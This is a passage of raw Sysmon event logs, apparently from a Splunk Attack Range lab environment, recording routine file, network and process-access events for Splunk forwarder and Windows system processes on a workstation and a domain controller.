Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163C927AD076E06C63B1F1FD40FEFE92,SHA256=24D0127AEDFA3BCE6EBD8501585D96030032E1AA119BDBC1AB1B46AD661C30B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:44.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E590E5D681973FA9B80C023ACA9B9C1E,SHA256=F92E8D37925AD027596009614FF9FE3973F8F7D587F28ED98F9297C6B0FEDBDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:43.279{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57449-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001054285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:37.792{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57450-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001054284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:45.981{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9751B12110410638789C1B4E91AF28F,SHA256=C534BBA707DA78B7554A42F5C5C9DAE6878316165B1C0F2B7A4861F8D895AB9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:45.427{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5A21504CF7FD0F4D8A239D1537830D1,SHA256=93EB4BD9D0D23F26084CF59170088626E251DD4A1C42603BA5C63FE28EBF59E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:44.116{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-37237-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:45.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9807F1D7680269CF34454697583D8A68,SHA256=8F23BBED3999905C23212CF32C8DA624F75C91CE62AFBC3F0C9FA9CDAEF7334A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:45.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8FEA4A7CFACD5C9AE669C8A95CEB283,SHA256=FAC4100517DABE90882757F31FAB4D2A0A5C494464FCBEDA8EADEB5D529D45FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:46.537{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78B11BDEE21BCAF840D5F604D5C05D5,SHA256=22530E9CB57B751236811013161ACC46417A19E7A2FA544587BC70D1FA22D154,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:46.396{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:46.396{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000810216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:44.416{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57450-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:47.552{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCF0B7705686ACBC5F7CF200A2C12DC0,SHA256=377783776205B4A20B5B91B1E7A4251F79CB4D354047EDAB359931140FAD5CE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:46.996{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CEB41828466DCCFD4F8F3BA5EA3E274,SHA256=1CBA147A0FA1F9E04AB72A606792CD26B4164D85C2D13C61AAA41C634889D9B3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:48.584{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A77DD44AAA73B5283621B7F106CEB7C,SHA256=C00F4401B58E8892B8ACC06C6F2BB99E50FFEAA92244B24286B3F7C5D041FC12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:47.996{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF258D3A919A0DD651AE35428C8EAC59,SHA256=7AEAC9FADC6D5E622288D2AF33A92706210913C11FCA892E1CA91645935E54CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:49.631{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D516B4C70C31EC238F10DDFEB75B9F58,SHA256=D6B90F9B8BAB801F070D20594460BF181A5DA1F0D3272A96CDB5A64FCEDE27E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:49.029{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCF843791CA715453D739F3893303E4B,SHA256=F4A874A965A70D909F8226F67462B37841BABD23BD7D6E4A08E17CFAAABA0810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:50.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26B26FBDF122647C0DBBA957F130ED79,SHA256=6BE72C045E4BB5AB668A11A0B575379150BC0F24BF3BE03C9B7032D380C25D04,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.911{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81A-60EB-E97D-00000000CF01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:50.911{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.911{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:50.895{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.895{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F81A-60EB-E97D-00000000CF01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:50.895{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.895{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81A-60EB-E97D-00000000CF01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.896{466BC892-F81A-60EB-E97D-00000000CF01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.496{466BC892-F81A-60EB-E87D-00000000CF01}100328908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:50.480{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-6E0B-00000000CF01}6608C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.248{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81A-60EB-E87D-00000000CF01}10032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F81A-60EB-E87D-00000000CF01}10032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.232{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81A-60EB-E87D-00000000CF01}10032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.180{466BC892-F81A-60EB-E87D-00000000CF01}10032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 